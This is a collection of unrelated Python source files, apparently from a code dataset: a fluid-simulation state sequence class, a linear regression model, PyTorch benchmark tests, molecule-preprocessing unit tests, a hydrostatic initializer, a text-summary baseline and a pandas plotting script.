self.sequence = [state for state in states]
class SequenceIterator:
def __init__(self, sequence):
self.seq = sequence
self.idx = 0
def __next__(self):
if self.idx<len(self.seq):
idx = self.idx
self.idx +=1
return self.seq[idx]
raise StopIteration
def __iter__(self):
return self.SequenceIterator(self)
def __getitem__(self, idx):
return self.sequence[idx]
def __len__(self):
return len(self.sequence)
@classmethod
def from_file(cls, load_path, frames, transform=None, as_var=True, base_path=None, boundary=None, scale_renderer=None, warp_renderer=None, device=None, density_filename="density.npz", velocity_filename="velocity.npz", frame_callback=lambda idx, frame: None):
sequence = []
prev = None
for idx, frame in enumerate(frames):
frame_callback(idx, frame)
sub_dir = 'frame_{:06d}'.format(frame)
data_path = os.path.join(load_path, sub_dir)
state = State.from_file(data_path, frame, transform=transform, as_var=as_var, boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, \
device=device, density_filename=density_filename, velocity_filename=velocity_filename)
if base_path is not None:
state.data_path = os.path.join(base_path, sub_dir)
os.makedirs(state.data_path, exist_ok=True)
state.prev = prev
prev = state
sequence.append(state)
for i in range(len(sequence)-1):
sequence[i].next = sequence[i+1]
return cls(sequence)
@classmethod
def from_scalarFlow_file(cls, density_path_mask, velocity_path_mask, frames, transform=None, as_var=True, base_path=None, boundary=None, scale_renderer=None, warp_renderer=None, device=None, vel_frame_offset=1, frame_callback=lambda idx, frame: None):
sequence = []
prev = None
for idx, frame in enumerate(frames):
frame_callback(idx, frame)
sub_dir = 'frame_{:06d}'.format(frame)
density_path = density_path_mask.format(frame=frame)
velocity_path = velocity_path_mask.format(frame=frame+vel_frame_offset)
state = State.from_scalarFlow_file(density_path, velocity_path, frame=frame, transform=transform, as_var=as_var, boundary=boundary, scale_renderer=scale_renderer, warp_renderer=warp_renderer, device=device)
if base_path is not None:
state.data_path = os.path.join(base_path, sub_dir)
os.makedirs(state.data_path, exist_ok=True)
state.prev = prev
prev = state
sequence.append(state)
for i in range(len(sequence)-1):
sequence[i].next = sequence[i+1]
return cls(sequence)
def copy(self, as_var=None, device=None):
s = [_.copy(as_var=as_var, device=device) for _ in self]
for i in range(len(s)):
if i>0:
s[i].prev = s[i-1]
if i<(len(s)-1):
s[i].next = s[i+1]
return Sequence(s)
def insert_state(self, state, idx):
self.sequence.insert(idx, state)
def append_state(self, state):
self.sequence.append(state)
def start_iteration(self, iteration):
for state in self:
state.start_iteration(iteration)
def stats(self, vel_scale=[1,1,1], mask=None, **warp_kwargs):
return [_.stats(vel_scale, mask=mask, state=_, **warp_kwargs) for _ in self]
def save(self, path=None, suffix=None):
for state in self:
if path is None and hasattr(state, 'data_path'):
state.save(state.data_path, suffix)
else:
state.save(os.path.join(path, 'frame_{:06d}'.format(state.frame)), suffix)
def densities_advect_fwd(self, dt=1.0, order=1, clamp='NONE'):
if clamp is None or clamp.upper() not in ['LOCAL', 'GLOBAL']:
for i in range(1, len(self)):
self[i].density.assign(self[i-1].density_advected(order=order, dt=dt, clamp=clamp))
elif clamp.upper()=='LOCAL': #clamp after each step, before the next warp
for i in range(1, len(self)):
self[i].density.assign(tf.maximum(self[i-1].density_advected(order=order, dt=dt), 0))
elif clamp.upper()=='GLOBAL': #clamp after all warping
for i in range(1, len(self)):
self[i].density.assign(self[i-1].density_advected(order=order, dt=dt))
for i in range(1, len(self)):
self[i].density.assign(tf.maximum(self[i].density._d, 0))
def velocities_advect_fwd(self, dt=1.0, order=1, clamp='NONE'):
for i in range(1, len(self)):
self[i].velocity.assign(*self[i-1].velocity.warped(order=order, dt=dt, clamp=clamp))
|
144438
|
import numpy as np
from ._base import LinearModel
from ._regularization import REGULARIZE, Regularizer
from utils import batch
class LinearRegression(LinearModel):
"""Linear regression model."""
def __init__(self, regular: REGULARIZE = None):
super().__init__()
if regular is not None:
self._regular = Regularizer(regular)
else:
self._regular = None
def fit(self, x: np.ndarray, y: np.ndarray, **kwargs) -> float:
assert x.shape[0] == y.shape[0]
n, p = x.shape
if self._w is None or self._b is None or self._w.shape[0] != p:
# Initialize weights using random values
self._init_model(p)
if kwargs is not None:
# Update parameters of training
self._update_params(kwargs)
iters, loss = 0, 0.
# Iterates till converge or iterating times exceed bound
while iters < self._iter_bound:
iters += 1
# Update weights using mini-batch gradient descent
for batch_x, batch_y in batch(x, y, self._batch_size):
pred_val = self._predict_value(batch_x, self._w, self._b)
loss += self._loss(pred_val, batch_y) * batch_x.shape[0]
grad_w, grad_b = self._grad(batch_x, pred_val, batch_y)
self._w -= grad_w
self._b -= grad_b
loss /= n
# Break if model converges.
if loss <= self._loss_tol:
break
# Update model with current weight and bias
self._update_model(loss)
return loss
def fit_norm_eq(self, x: np.ndarray, y: np.ndarray) -> float:
# Fit x using normal equation
assert x.shape[0] == y.shape[0]
n, p = x.shape
if self._w is None or self._b is None or self._w.shape[0] != p:
# Initialize weights using random values
self._init_model(p)
x_ext = np.hstack((np.ones((n, 1)), x))
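# The next two lines solve the normal equation on the bias-augmented design
# matrix, w_ext = pinv(X_ext^T X_ext) X_ext^T y; the pseudo-inverse keeps the
# solve well-defined even when X_ext^T X_ext is singular.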
w_ext = np.linalg.pinv(np.matmul(x_ext.T, x_ext))
w_ext = np.matmul(np.matmul(w_ext, x_ext.T), y)
self._w, self._b = w_ext[1:], w_ext[0]
# Calculate training loss
pred_val = self._predict_value(x, self._w, self._b)
loss = self._loss(pred_val, y)
self._update_model(loss)
return loss
def predict(self, x: np.ndarray, **kwargs) -> np.ndarray:
assert not np.isinf(self._optimum['loss'])
assert self._optimum['w'].shape[0] == x.shape[1]
pred_val = self._predict_value(x, self._optimum['w'],
self._optimum['b'])
return pred_val
def evaluate(self, x: np.ndarray, y: np.ndarray, **kwargs) -> tuple:
assert x.shape[0] == y.shape[0]
assert not np.isinf(self._optimum['loss'])
assert self._optimum['w'].shape[0] == x.shape[1]
pred_val = self._predict_value(x, self._optimum['w'],
self._optimum['b'])
# The precision part of regression is None
precision = None
loss = self._loss(pred_val, y)
return precision, loss
@staticmethod
def _predict_value(x: np.ndarray, w: np.ndarray,
b: float) -> np.ndarray:
pred_val = np.matmul(x, w) + b
return pred_val
@staticmethod
def _predict_label(pred_val: np.ndarray) -> np.ndarray:
# NO labeling in regression.
pass
def _loss(self, pred_val: np.ndarray, true_val: np.ndarray) -> float:
# Use MSE loss
loss = float(np.sum(np.power(pred_val - true_val, 2)))
loss /= 2 * true_val.shape[0]
# Add regularized loss
if self._regular is not None:
loss += self._regular[self._w]
return loss
def _grad(self, x: np.ndarray, pred_val: np.ndarray,
true_val: np.ndarray) -> tuple:
# Use MSE loss
grad_w = (x * (pred_val - true_val).reshape((-1, 1))).mean(axis=0)
grad_b = (pred_val - true_val).mean()
# Use simple gradient by multiplying learning rate and grad.
grad_w *= self._learn_rate
grad_b *= self._learn_rate
# Add regularized grad
if self._regular is not None:
grad_w += self._regular.grad(self._w)
return grad_w, grad_b
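# Minimal usage sketch (illustrative only; the data and available keyword
# arguments are assumptions, not part of this module):
# model = LinearRegression()
# x = np.random.rand(200, 3)
# y = x @ np.array([1.0, -2.0, 0.5]) + 0.3
# loss_gd = model.fit(x, y)          # mini-batch gradient descent
# loss_ne = model.fit_norm_eq(x, y)  # closed-form normal equation
# preds = model.predict(x)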
|
144440
|
from __future__ import print_function
import pytest
import torch
from .runner import get_nn_runners
default_rnns = ['cudnn', 'aten', 'jit', 'jit_premul', 'jit_premul_bias', 'jit_simple',
'jit_multilayer', 'py']
default_cnns = ['resnet18', 'resnet18_jit', 'resnet50', 'resnet50_jit']
all_nets = default_rnns + default_cnns
def pytest_generate_tests(metafunc):
# This creates lists of tests to generate, can be customized
if metafunc.cls.__name__ == "TestBenchNetwork":
metafunc.parametrize('net_name', all_nets, scope="class")
metafunc.parametrize("executor_and_fuser", ["legacy-old"], scope="class")
def set_fuser(fuser_name):
if fuser_name == 'te':
torch._C._jit_override_can_fuse_on_cpu(False)
torch._C._jit_override_can_fuse_on_gpu(False)
torch._C._jit_set_texpr_fuser_enabled(True)
elif fuser_name == 'old':
torch._C._jit_override_can_fuse_on_gpu(True)
torch._C._jit_set_texpr_fuser_enabled(False)
elif fuser_name == 'none':
torch._C._jit_override_can_fuse_on_gpu(False)
torch._C._jit_override_can_fuse_on_cpu(False)
torch._C._jit_set_texpr_fuser_enabled(False)
def set_executor(executor_name):
if executor_name == 'profiling':
torch._C._jit_set_profiling_executor(True)
torch._C._jit_set_profiling_mode(True)
torch._C._jit_set_bailout_depth(20)
elif executor_name == 'simple':
torch._C._jit_set_profiling_executor(True)
torch._C._jit_set_profiling_mode(False)
elif executor_name == 'legacy':
torch._C._jit_set_profiling_executor(False)
torch._C._jit_set_profiling_mode(False)
@pytest.fixture(scope='class')
def modeldef(request, net_name, executor_and_fuser):
executor, fuser = executor_and_fuser.split("-")
set_executor(executor)
set_fuser(fuser)
# Given a 'net_name' provided by generate_tests, build the thing
name, rnn_creator, context = get_nn_runners(net_name)[0]
creator_args = {
'seqLength': 100, 'numLayers': 1,
'inputSize': 512, 'hiddenSize': 512,
'miniBatch': 64, 'device': 'cuda', 'seed': None
}
return rnn_creator(**creator_args)
def cuda_sync(func, *args, **kwargs):
out = func(*args, **kwargs)
torch.cuda.synchronize()
return out
@pytest.mark.benchmark(
warmup=True,
warmup_iterations=3,
disable_gc=True,
max_time=0.1,
group="fastrnns",
)
class TestBenchNetwork:
# See 'modeldef' fixture, which provides the things to benchmark
def test_forward(self, modeldef, benchmark):
forward_output = benchmark(cuda_sync, modeldef.forward, *modeldef.inputs)
def test_backward(self, modeldef, benchmark):
backward_input = modeldef.forward(*modeldef.inputs)
if modeldef.backward_setup is not None:
backward_input = modeldef.backward_setup(backward_input)
if modeldef.backward is not None:
benchmark(cuda_sync, modeldef.backward, *backward_input, retain_graph=True)
for param in modeldef.params:
assert param.grad is not None
param.grad.data.zero_()
|
144484
|
import numpy as np
import pytest
from chainer_chemistry.dataset.preprocessors import wle_util
def test_to_index():
values = ['foo', 'bar', 'buz', 'non-exist']
mols = [['foo', 'bar', 'buz'], ['foo', 'foo'], ['buz', 'bar']]
actual = wle_util.to_index(mols, values)
expect = np.array([np.array([0, 1, 2], np.int32),
np.array([0, 0], np.int32),
np.array([2, 1], np.int32)])
assert len(actual) == len(expect)
for a, e in zip(actual, expect):
np.testing.assert_array_equal(a, e)
def test_to_index_non_existence():
values = ['foo', 'bar']
mols = [['strange_label']]
with pytest.raises(ValueError):
wle_util.to_index(mols, values)
def test_compress_relation_axis_2_dim():
arr = np.random.uniform(size=(10, 2))
actual = wle_util.compress_relation_axis(arr)
np.testing.assert_array_equal(actual, arr)
def test_compress_relation_axis_3_dim():
arr = np.array(
[
[
[1, 0],
[2, 0],
],
[
[1, 1],
[0, 0]
]
]
)
arr = np.swapaxes(arr, 0, 1)
ret = wle_util.compress_relation_axis(arr)
actual = ret != 0
expect = np.array(
[[True, True],
[True, False]]
)
np.testing.assert_array_equal(actual, expect)
def test_compress_relation_axis_invalid_ndim():
arr = np.zeros(3)
with pytest.raises(ValueError):
wle_util.compress_relation_axis(arr)
arr = np.zeros((1, 2, 3, 4))
with pytest.raises(ValueError):
wle_util.compress_relation_axis(arr)
@pytest.fixture
def small_molecule():
# a-b-c d
atom_array = ['a', 'b', 'c', 'd']
neighbors = np.array(
[
[0, 1, 1, 2], # first end of edges
[1, 0, 2, 1] # second end of edges
]
)
return atom_array, neighbors
def test_get_neighbor_representation_with_focus_atom(small_molecule):
atom_array, neighbors = small_molecule
expects = ['a-b', 'b-a.c', 'c-b', 'd-']
for i in range(len(expects)):
actual = wle_util.get_neighbor_representation(
i, atom_array, neighbors, True)
assert actual == expects[i]
def test_get_neighbor_representation_without_focus_atom(small_molecule):
atom_array, neighbors = small_molecule
expects = ['b', 'a.c', 'b', '']
for i in range(len(expects)):
actual = wle_util.get_neighbor_representation(
i, atom_array, neighbors, False)
assert actual == expects[i]
@pytest.mark.parametrize('label, expect', [
('a-b', 'a'),
('a-b.c', 'a'),
('aa-b', 'aa'),
('a-', 'a'),
('aa-', 'aa'),
])
def test_get_focus_node_label(label, expect):
actual = wle_util.get_focus_node_label(label)
assert actual == expect
@pytest.mark.parametrize('label', ['aa', 'a-a-a', 'a--'])
def test_get_focus_node_label_invalid(label):
with pytest.raises(ValueError):
wle_util.get_focus_node_label(label)
|
144491
|
import torch.nn.functional as F
import torch
def onehot(X, num_classes):
# Index rows of an identity matrix with the label tensor to build one-hot vectors.
ident = torch.eye(num_classes, dtype=int)
X_onehot = ident[X]
return X_onehot
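# Illustrative usage (assumed example, not part of the original file):
# labels = torch.tensor([0, 2, 1])
# onehot(labels, 3)
# -> tensor([[1, 0, 0],
#            [0, 0, 1],
#            [0, 1, 0]])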
|
144507
|
from __future__ import print_function
import numpy as np
import sys
import mesh.patch as patch
from util import msg
def init_data(my_data, rp):
""" initialize the HSE problem """
msg.bold("initializing the HSE problem...")
# make sure that we are passed a valid patch object
if not isinstance(my_data, patch.CellCenterData2d):
print("ERROR: patch invalid in hse.py")
print(my_data.__class__)
sys.exit()
# get the density, momenta, and energy as separate variables
dens = my_data.get_var("density")
xmom = my_data.get_var("x-momentum")
ymom = my_data.get_var("y-momentum")
ener = my_data.get_var("energy")
gamma = rp.get_param("eos.gamma")
grav = rp.get_param("compressible.grav")
dens0 = rp.get_param("hse.dens0")
print("dens0 = ", dens0)
H = rp.get_param("hse.h")
# isothermal sound speed (squared)
cs2 = H*abs(grav)
# initialize the components, remember, that ener here is
# rho*eint + 0.5*rho*v**2, where eint is the specific
# internal energy (erg/g)
xmom[:, :] = 0.0
ymom[:, :] = 0.0
dens[:, :] = 0.0
# set the density to be stratified in the y-direction
myg = my_data.grid
p = myg.scratch_array()
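# Integrate the pressure upward from the bottom row with a trapezoidal
# discretization of hydrostatic equilibrium, dp/dy = rho*g, so the initial
# state is in balance with the isothermal density stratification set below.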
for j in range(myg.jlo, myg.jhi+1):
dens[:, j] = dens0*np.exp(-myg.y[j]/H)
if j == myg.jlo:
p[:, j] = dens[:, j]*cs2
else:
p[:, j] = p[:, j-1] + 0.5*myg.dy*(dens[:, j] + dens[:, j-1])*grav
# set the energy
ener[:, :] = p[:, :]/(gamma - 1.0) + \
0.5*(xmom[:, :]**2 + ymom[:, :]**2)/dens[:, :]
def finalize():
""" print out any information to the user at the end of the run """
pass
|
144510
|
import sys
import os
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, 'textrank'))
from summa.preprocessing.textcleaner import get_sentences # Uses textrank's method for extracting sentences.
BASELINE_WORD_COUNT = 100
def baseline(text):
""" Creates a baseline summary to be used as reference.
The baseline is set to an extract of the first 100 words.
"""
sentences = list(get_sentences(text))
baseline_summary = ""
word_count = 0
for sentence in sentences:
for word in sentence.split():
baseline_summary += word + " "
word_count += 1
if word_count == BASELINE_WORD_COUNT:
return baseline_summary
baseline_summary += "\n"
return baseline_summary
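# Example usage (hypothetical input, shown for illustration):
# text = open("article.txt").read()
# summary = baseline(text)  # roughly the first 100 words, sentence by sentence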
|
144609
|
import pandas as pd
import matplotlib.pyplot as plt
# Import our data file
stock_prices = pd.read_csv('/data/tesla.csv')
# Print stock_prices DataFrame for review
# print(stock_prices)
# Print using the .describe() method
# print(stock_prices.describe())
# Print the minimum value of Open
# print(stock_prices['Open'].min())
# Print the maximum value of Open
# print(stock_prices['Open'].max())
# Print the average or the mean value of Open
# print(stock_prices['Open'].mean())
stock_prices['Open'].plot(kind='box')
plt.show()
|